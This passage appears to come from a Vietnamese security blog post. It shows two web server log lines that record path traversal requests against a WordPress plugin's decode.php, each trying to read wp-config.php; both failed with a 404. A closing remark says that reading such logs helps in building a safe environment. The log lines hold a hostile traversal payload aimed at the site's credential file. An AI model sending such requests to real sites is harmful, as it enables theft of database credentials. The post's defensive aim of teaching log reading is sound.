172.69.132.242 - - [18/Jan/2020:18:24:12 +0000] "GET /wp-content/plugins/photocart-link/decode.php?id=../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" | |
172.69.132.110 - - [18/Jan/2020:18:24:13 +0000] "GET /wp-content/plugins/photocart-link/decode.php?id=../../../wp-config.php HTTP/1.1" 404 47 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" |
Sau khi đọc các log bạn hoàn toàn có thể có cho mỉnh một định hướng tốt để xây dựng một môi trường an toàn.
Không có nhận xét nào:
Đăng nhận xét